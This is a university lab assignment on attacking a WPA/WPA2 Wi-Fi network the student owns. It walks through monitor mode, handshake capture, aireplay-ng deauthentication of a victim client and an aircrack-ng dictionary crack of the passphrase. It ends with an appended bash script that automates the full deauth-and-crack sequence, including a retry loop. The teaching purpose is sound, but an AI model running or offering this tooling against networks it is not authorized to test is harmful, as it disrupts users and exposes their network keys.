Question
Notes:
(1) Equipment: You need to have administrative privilege over, or be given consent to use with administrative privilege, a computer/laptop (the pen-tester or attacker machine), a Wi-Fi router (access point) running the WPA/WPA2-PSK security protocol, and another Windows machine as the target/victim machine, all connected in a wireless LAN environment.
(2) Tools: You need to run Linux on the pen-tester machine (such as Kali Linux). Specific Kali Linux tools to be used include (but are not limited to) the Aircrack-ng suite, Metasploit, nmap, etc. You may download Kali Linux and make a bootable USB drive to run Kali Linux on your computer/laptop (see the instructions at https://docs.kali.org/downloading/kali-linux-live-usb-install for details). Alternatively, you may install VirtualBox on your computer/laptop (https://www.virtualbox.org/manual/ch01.html) and run Kali Linux as a virtual machine (https://www.blackmoreops.com/2014/04/08/detailed-guide-installing-kali-linux-on-virtualbox/). When running Kali Linux as a virtual machine, the VM usually cannot see the host machine's built-in wireless card, so you will most likely need a USB Wi-Fi adapter (dongle) passed through to the VM in order for it to have a wireless interface that supports monitor mode and packet injection (see https://www.youtube.com/watch?v=K1ETBeRQBs4 for details on purchasing a Kali Linux compatible Wi-Fi USB adapter and setting up the wireless connection in the VM). In sum, the pen-tester machine could be: an Intel-based machine booted into Kali Linux, Kali Linux running as a virtual machine on a host computer/laptop, or a Linux machine that has the necessary tools (aircrack-ng, metasploit, etc.) installed for the assignment. In all cases, your pen-tester/attacker machine needs to have wireless access while running Linux.
(3) As always, be sure to include adequate explanations and details in your answers to each of the questions (otherwise, points will be deducted if there is an insufficient/inadequate amount of explanation/detail in your submitted work).
1. (8 pts.) In this question the attacker/pen-tester machine attempts to capture the WPA/WPA2 4-way handshake packets exchanged between an AP and a victim/target machine, by first de-authenticating the victim from the AP so that it reconnects, then running a dictionary (wordlist) attack against the packet capture file to crack the pre-shared key of the WLAN. The main tools used are part of the aircrack-ng suite (preinstalled in Kali Linux); use the examples described at https://www.aircrack-ng.org/doku.php?id=deauthentication#usage_examples and https://www.aircrack-ng.org/doku.php?id=cracking_wpa as a guide. Follow the steps below and describe your work/results (including screenshots) in your own words for each of the steps.
Note: To balance documenting your work with protecting your privacy, do not include model/serial numbers in your answers or screenshots; for MAC addresses (6 bytes), report only the first 2 bytes and blank out (redact) the last 4 bytes; for SSIDs, blank out (redact) all leading characters except for the last character of the SSID.
(a) Describe briefly the equipment you use for this question, including: the pen-tester and target machines (e.g., a Dell laptop running Kali Linux VM in Virtualbox, and a Dell desktop PC, respectively) and the AP (e.g., an IEEE 802.11n Wireless router/DSL modem made by Zyxel). Additionally, include a statement whether you have the administrative privilege, or are given the consent, to conduct penetration testing using the equipment described here.
(b) In Kali Linux, open a terminal and use the command ifconfig -a (or ip link show) to make sure your pen-tester/attacker machine sees the wireless interface wlan0 and that it is up. Produce a screenshot showing the wlan0 interface and the current time when you did this work (use the date command to show the current date/time).
(c) Log on to your wireless router/access point and change its current password/passphrase to something different but equally strong (with adequate length and a mix of character classes). Report what you did (but do not report your AP's old password/passphrase), when you made the change (e.g., 05:10 pm on 11/18/2018), and the new password/passphrase. After completing Question 1, be sure to restore the AP's password/passphrase to its original value.
(d) After you changed the AP's password/passphrase, reconnect your target/victim machine to the AP using the new password/passphrase. Do not reconnect your pen-tester/attacker machine to the AP using the new password/passphrase. In Kali Linux, open a terminal and run the commands below to put the pen-tester machine's wireless interface in monitor mode and to identify the AP and the connected target/victim device. Report what you did, when you did it, and the relevant screenshots (be sure to blank out/redact portions of the MAC addresses, SSIDs, etc. in your screenshots, as noted above):
airmon-ng start wlan0 (puts the pen-tester's wireless adapter in monitor mode; the monitor interface is normally named wlan0mon. If NetworkManager or wpa_supplicant keeps resetting the interface, run airmon-ng check kill first to stop those services.)
airodump-ng wlan0mon (identifies your AP's MAC address (BSSID), the channel number it uses, and the target device's MAC address, which airodump-ng lists as a STATION associated with that BSSID)
(e) Once you have identified your AP's channel (e.g., 11), run the command below to capture wireless packets on that channel and write/save them to a file. Report your work, the time, and the relevant screenshot(s):
airodump-ng -c 11 --bssid xx:xx:xx:xx:xx:xx -w out wlan0mon
This starts capturing wireless packets on channel 11 (replace 11 with your AP's channel), filtered to the AP's 6-byte MAC address written with colon separators (replace the xx's with your AP's MAC address), and saves the packets to files whose names start with out in the current directory (e.g., under /root); airodump-ng numbers them out-01.cap, out-01.csv, and so on, and only the .cap file is needed for cracking.
(f) Open a new terminal in Kali (keeping the terminal of the previous part intact), run the aireplay-ng command below to de-authenticate the target/victim machine, and wait until the airodump-ng command of the previous part captures the WPA/WPA2 4-way handshake packets exchanged between the AP and the target/victim machine when it reconnects:
aireplay-ng -0 1 -a xx:xx:xx:xx:xx:xx -c yy:yy:yy:yy:yy:yy wlan0mon
-0 selects the de-authentication attack
1 is the number of de-authentication bursts to send (you can send more if the first one is missed; 0 means send continuously)
-a xx:xx:xx:xx:xx:xx specifies the AP's MAC address
-c yy:yy:yy:yy:yy:yy specifies the client (target/victim) machine's MAC address
Describe your work (procedure and steps), results, and relevant screenshot(s).
Wait for the airodump-ng terminal of Part (e) to show that the WPA handshake has been captured (the message "WPA handshake: <AP MAC>" is displayed in its upper right corner). Take a screenshot, then press CTRL-C to terminate the airodump-ng command started in Step (e). Use the command ls -l to list the capture file(s) in the current directory. Describe your work, results, and relevant screenshot(s).
(g) Create a dictionary (wordlist) consisting of the current password/passphrase of the AP; for example, the command echo 'zzzzz' > dictionary (replacing zzzzz with your AP's password/passphrase, and keeping the single quotes so that characters such as $ or ! are not interpreted by the shell) creates a file named dictionary in the current directory consisting of the single word zzzzz. Use the command cat dictionary to print the file's content. Describe your work, results, and relevant screenshot(s). Note that a WPA/WPA2-PSK passphrase is 8 to 63 characters long, so wordlist entries outside that range cannot be the key and aircrack-ng does not try them. Please note also that in practice the dictionary/wordlist would consist of many words that are presumably popular choices for a password/passphrase, and that APs using such common passwords/passphrases are potential hacking victims.
(h) Use the aircrack-ng command shown below to crack the AP's password/passphrase:
aircrack-ng -w dictionary out*.cap
If the capture file contains more than one network, aircrack-ng prompts you to choose the target; adding -b xx:xx:xx:xx:xx:xx (your AP's MAC address) selects it directly. Describe your work, results, and relevant screenshot(s).
(i) After successfully completing the above work, log on to your AP and restore the AP's password/passphrase to its original value.
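As an added example (not part of the assignment text or of the aircrack-ng documentation), the script below wraps parts (d) through (h) into one run and includes helpers for the redaction rule and for writing the one-word dictionary. It assumes Kali's naming of the monitor interface as "<iface>mon", that airodump-ng writes its capture as out-NN.cap in the current directory, and that aircrack-ng run on a capture without a wordlist lists each BSSID with its handshake count (e.g. "WPA (1 handshake)"); the interface, MAC addresses and channel on the command line are placeholders to be replaced with your own. It must be run as root and only against an AP you own or have written consent to test.

```shell
#!/usr/bin/env bash
# Added example for Question 1, parts (d)-(h): monitor mode, filtered capture,
# deauthentication, handshake check, dictionary attack. Not the assignment's
# own code. Assumptions: monitor interface "<iface>mon" (Kali naming), capture
# written as out-NN.cap, aircrack-ng's no-wordlist summary shows "(N handshake".

# Redaction rule from the assignment: keep the first 2 bytes of a MAC address.
redact_mac() {
    printf '%s:xx:xx:xx:xx\n' "$(printf '%s' "$1" | cut -d: -f1,2)"
}

# Redaction rule from the assignment: keep only the last character of an SSID.
redact_ssid() {
    local ssid=$1 n=${#1} stars='' i=0
    local last=${ssid#"${ssid%?}"}          # strip everything but the last char
    while [ "$i" -lt $((n - 1)) ]; do stars="${stars}*"; i=$((i + 1)); done
    printf '%s%s\n' "$stars" "$last"
}

# WPA/WPA2-PSK passphrases are 8 to 63 characters; anything else cannot be the key.
valid_psk_len() {
    [ "${#1}" -ge 8 ] && [ "${#1}" -le 63 ]
}

# Part (g): one-entry wordlist. printf avoids echo's backslash handling, and the
# caller's quoting keeps $ or ! in the passphrase away from the shell.
write_dictionary() {
    valid_psk_len "$1" || { echo "passphrase must be 8-63 characters" >&2; return 1; }
    printf '%s\n' "$1" > "$2"
}

# True once the capture holds a 4-way handshake for the target BSSID
# (assumption: aircrack-ng's summary line reads "... WPA (1 handshake)").
handshake_captured() {
    aircrack-ng "$1" 2>/dev/null | grep -iF "$2" | grep -Eq '\([1-9][0-9]* handshake'
}

main() {
    iface=$1 bssid=$2 channel=$3 client=$4 dict=${5:-dictionary}
    [ "$(id -u)" -eq 0 ] || { echo "run as root" >&2; return 1; }
    airmon-ng check kill            # stop NetworkManager/wpa_supplicant from resetting the card
    airmon-ng start "$iface"        # part (d)
    mon="${iface}mon"               # Kali monitor-interface naming (assumption)
    # Part (e): capture only the target AP's channel, filtered on its BSSID.
    airodump-ng -c "$channel" --bssid "$bssid" -w out "$mon" >/dev/null 2>&1 &
    dump_pid=$!
    sleep 5
    cap=$(ls -t out-*.cap | head -n 1)
    # Part (f): deauth the client, wait for it to reassociate, retry if the
    # handshake was missed (a burst too early or a client that does not return).
    for attempt in 1 2 3 4 5; do
        aireplay-ng -0 1 -a "$bssid" -c "$client" "$mon"
        sleep 10
        if handshake_captured "$cap" "$bssid"; then
            echo "handshake captured on attempt $attempt (AP $(redact_mac "$bssid"))"
            break
        fi
    done
    kill "$dump_pid"                # same as CTRL-C in the airodump-ng terminal
    ls -l out-*
    # Part (h): -b pins the BSSID so aircrack-ng never prompts for a network.
    aircrack-ng -w "$dict" -b "$bssid" "$cap"
    airmon-ng stop "$mon"
}

# Usage: ./wpa_lab.sh run wlan0 <AP MAC> <channel> <client MAC> [dictionary]
if [ "${1:-}" = run ]; then main "$2" "$3" "$4" "$5" "$6"; fi
```

The deauth/handshake loop is the part most worth copying: a single aireplay-ng burst often arrives before the client is ready to reassociate, and checking the capture with aircrack-ng after each burst is more reliable than watching the airodump-ng banner, which can be overwritten by later screen refreshes.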